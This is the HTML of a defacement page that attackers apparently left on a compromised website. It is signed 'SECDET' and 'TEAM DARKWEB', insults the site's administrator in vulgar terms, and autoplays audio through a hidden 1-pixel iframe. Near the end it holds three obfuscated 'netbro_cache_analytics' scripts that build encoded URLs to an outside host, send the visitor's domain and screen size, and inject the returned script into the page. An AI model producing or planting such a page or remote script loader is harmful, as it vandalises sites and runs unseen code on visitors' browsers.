<html>
<title>Hacked By SECDET</title>
<center><p style="color:red;font-size:30;"></p></center>
<iframe frameborder="0" hight="1" width="1" loop="true" allow="autoplay" src="http://nulledblocks.tk/wp-includes/dark.mp3"></iframe>
<link rel="shortcut icon" href="https://cdn.iconscout.com/public/images/icon/premium/png-512/hacker-attack-hacking-cyber-crime-device-threat-virus-329739e689bd9892-512x512.png">
<link href='http://fonts.googleapis.com/css?family=Jolly+Lodger' rel='stylesheet' type='text/css'>
<link href="https://fonts.googleapis.com/css?family=Dosis|Freckle+Face|Walter+Turncoat" rel="stylesheet"> 
<link href='https://cdn.iconscout.com/public/images/icon/premium/png-512/hacker-attack-hacking-cyber-crime-device-threat-virus-329739e689bd9892-512x512.png' rel='icon' type='image/x-icon'/>
<meta property='og:description'        content='&#9760;  Limpid07 | GopressXploits TEAM &#9760; ' />
<audio autoplay>

</audio>
<style>
 body {
 background: url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");
 font-family: 'Courier new';
 text-align: center;
 color: #fff;
}
#bg {
 margin: auto;
 }
</style>
<style type="text/css">
#info-teja {
z-index: 1000;
background:-moz-linear-gradient(,  #1F2326,  #555);
background: -webkit-gradient(linear, left top, left bottom, from(#1F2326), to(#555));
box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;
-moz-box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;
-webkit-box-shadow:-2px -2px 8px #000000, 2px 2px 20px #000000;
width:460px;
position: fixed;
top:30px;
left:0;
margin-left:-350px;
border:1px solid #444;
background-position:top right no-repeat;
height:35px;
font:11px Arial;
color:#eee;
border-top-right-radius:8px;
border-bottom-right-radius:8px;
-moz-border-radius-topright:8px;
-moz-border-radius-bottomright:8px;
-webkit-border-top-right-radius:8px;
-webkit-border-bottom-right-radius:8px;
}
#info-teja{
-o-transition: all 1s ease-in;
-moz-transition: all 1s ease-in;
-webkit-transition: all 1s ease-in;
} 
#info-teja:hover{
width:250px;
opacity:1.0;
margin-left:0;
}
.Tejainbox {
border:1px solid #444;
width:250px; 
margin:0px 90px 10px 10px;
background:transparent;
color:#ffffff; 
border-radius :20px; 
padding:5px 0;
-moz-border-radius:20px; 
-webkit-border-radius:20px;
-o-transition:all 2s ease-in;
-moz-transition:all 2s ease-in;
-webkit-transition:all 2s ease-in;
opacity:0.2;
}
.Tejainbox:hover{
opacity:1.0;
box-shadow:1px 1px 15px #000; 
-moz-box-shadow: 1px 1px 15px #000; 
-webkit-box-shadow: 1px 1px 15px #000;
background: #000;
}
.Tejainbox2 {
margin:5px 10px;
padding:0px 8px 10px;
color:#FFFFFF;
overflow:hidden;
height:290px;
}
.teja15 {
border-radius:15px;
-moz-border-radius:15px;
-webkit-border-radius:15px;
}
.Teja2 ul.bom {
margin: 0; 
padding: 0;
}
.Tejainbox2 li {
margin-left:20px;
}
.Tejainbox2 li a {
color: #FFFFF; 
line-height: 4px; 
font-size: 11px;
font-weight: bold; 
text-decoration:none;
}
.Tejainbox2 li a:hover {
color: red;
text-shadow: 0 1px 1px #000;
}
.Tejainbox2 h2 { 
font: 18px Droid Serif;
font-weight:bold;
padding:0 8px;
color: #fffff;
text-shadow: 0px 1px 1px #ddd;
border-bottom: 1px solid #000000;
}
.Tejatouch {
font-size:21px;
font-weight:bold;
font-family:Arial Narrow;
float:right;
margin: 3px 8px 0 0;
-o-transition: all 0.5s ease-out;
-moz-transition: all 0.5s ease-out;
-webkit-transition: all 0.5s ease-out;
text-decoration:blink;
}
.lagu{

     background:transparent;

	border:2px solid blue;

	font-family:Share Tech Mono;

	color:black;

	font-size:18x;

	font-weight:bold;

	padding:3px 29px;

	text-decoration:none;

	text-shadow:0px 0px 20px blue;

  }


<! -- script lagu -- !>

.Tejatouch:hover{
-o-transform: scale(2) rotate(720deg) translate(0px);
-moz-transform: scale(2) rotate(720deg) translate(0px);
-webkit-transform: scale(2) rotate(720deg) translate(0px);
color: #fffff;}
</style>
 <img src="https://raw.githubusercontent.com/C4LLM3D3V1L/tyy/main/Picsart_22-09-24_12-10-04-747-removebg-preview.png" width="" height="500">
<br>
<font face="Jolly Lodger" color="red" size="1000"> &#9760; HACKED BY :  <font face="Jolly Lodger" color="silver" size="1000">SECDET &#9760;</font>
</font></font>
<br>
<center><font size="5" color="orange">#OH NO YOUR SITE IS HACKED<font></font><br><font size="5" color="orange">I LOVE YOUR GF </font>
<br><br>
<font size="10" color="yellow"><=WARNING=></font></font>
<br>
<br>
<center><font size="5" color="red">{DEAR MADAFAKA ADMIN}<font size="5" color="white"></font></font>
<br>
<font size="4" color="red">I FUCKED YOUR SECURITY<font></font><font color="silver" size="4"></font></font>
<br>
<font size="3" color="red">Your Website... Has Been Hacked <font size="5" color="white"></font></font>
<br>
<font size="3" color="silver">Nothing is Secure Everything is Vulnerable - <font size="5" color="white"></font></font>
<br>
<center><font color="red" size="4">No system Is safe!!</font></font>
<br><br><br>
<button class="lagu" onclick="play();liat();"><font face="Teko" size="5" color="red" >PLAY MUSIC</font></button><audio id="lagu" src="https://raw.githubusercontent.com/C4LLM3D3V1L/tyy/main/Berserk_skeleton_meme_(good_quality)(1080p).mp4" autoplay="1" loop="1"></audio><br>
<br>
<br>
<font face="Jolly Lodger" color="red" size="25">&#10026 TEAM &#10026;  <br><font face="Jolly Lodger" color="white" size="20"> &#9760 TEAM DARKWEB &#9760; </font></font>

<br><br>

<p><font size="5" color="#0ff"> |M4R_7 | SECDET | S4JJ4DUL | N4B1L-404 | 0xN4B1L |  |EXPECT US...
</p>
<br>
<source src="http://downloadmp3.planetlagu.site/save/01%20Setia%20Band%20Gugur%20.mp3" type="audio/mpeg">
 <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BaBE4X3VXCkfrwWkiJ4vEyEh10pFq66g4XzcifSzvSYSJCOrn7x57fNFXF2uXouvXggdJanj4D%2fNM6mDCVYvyd8h6PMrrhabRON%2fIoEyT3dMf%2b868BNZ0A53CJ7v9VIKhnjCJ%2bjTEOlcLJdBB9IJlcolQpaheHpvPpqzGi6UKL%2fpNjDJ0WpsqODuTEayFKjXznG9ius8cH2wBJabPOdfvTohws2Pa9U1AJSMGobHmE6sKkf4MYUBjlnMFW20gi7Kkw6da37XPwZKFI5XkvsDIT8JCOxoCdaxRj6pXbbys3mV082uFEJX3DN0CHHsfFn1ZPmiBRJZ6wGMy3xxbzZDP0nGrry39SGCOPbT9J0B7QxK9JS2RXgod4vG%2b6a07JhMyx3b2GPS3HKvKI2J5KnQKK4xILM069lrHUErljLpn0N1BGK8ErcuI5g%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BogxaChtjQfxClH%2fq%2bTK8%2bJxXKsSUJ5eE07p0E%2f5MTMXwtsorIxxkf%2f88mICyG4JZbHj709PT5L4MlDUDWweeseoibE2Z1ZVav%2fIVghx9LTJS98oUv7zj%2fn8riBe3oW3PPekdQTn8j8hnnsuyDHg4wYa9uIAnbm7LqDkalWFln1VC0h5jZkesm5m4ZCx7Da5MEd%2fdrD8tCituZ1Rlp6kqJ%2f5arvxajUnRFCtaggbKUuhQP63U26a3dJP6NjO4eJJ1%2fGaQqtpP4%2fTsscfgKefm5HBi3yRDumB57KYuBOUGmaHaZorVxTtX3wfle9Uai8YlR1sOJX2SBzbhuuTpdL9wRm%2f8Kck2Aw8Bn7sAlVe7xyN5vh8xskKjRADiIibKGh4lplixtydBnpv0yEuSdccgtuyyN26z08RseKIetDW8Fxp7lktVm%2bUaA3%2f%2b889LuWP6dTopVJFB6WVpwjFSsWpa%2f1pOM9tmBxOYwdipT9a1FHZlopIr6lzN79LteNaxl8PaarPWTT89Cog%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
 <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKwPIfIQtQLkp0CCIXcOv3a%2fh0rP81r5Z43dZAcRT5mKVDMylBbSDWXAwemhDqbXOnRldyM92aZzs7shWfiLBOoC9P6aPlNooQ4CAAU0mPdHfrcElFhu3nxJTdVMsGyPUuGRb5oNpkNpwoBssxFdt1R%2f2%2fqpx%2flAd7O40HeVTUlE7tJF8bsVhwDdEico4xFN2LudteMqnvBwMa%2bDdi69iPeh%2behpA1h90oQ6Dd11LdhjxtnpGo5ekvD090uo1jURJ%2b0tbOkj787tOe25r9LabbD%2fv1UAQOMSf3TSg3uvZOxxx08ubu3Q1ly0iDoDzJ4%2bmH6eC4Jmn49NygEqV5U6Rv8ldqZwavY%2fZxGmd8UyzbdqRmpFDs5qiL1BUM%2fYq8JQwhuy0gF%2foaK6S2gV64iA304YXaqiy9Sbk1%2bmGVJaN6hIMm1rM%2fcxrkbAnkMOtkkPN%2bA%2fhwC9%2f4WoXfg1TZIZo6aH0rghTzwLKSWj6qW4nreeQup2nlOMfTGrVhK9IFzGsPdOGlHUxZfVc7lATuyPo8GDxTRuHY9V%2bJOfgXtKGL8G0%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
 <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 

</script>
<script>
    alert("SECDET IS HERE !")
</script>
</html>

</script>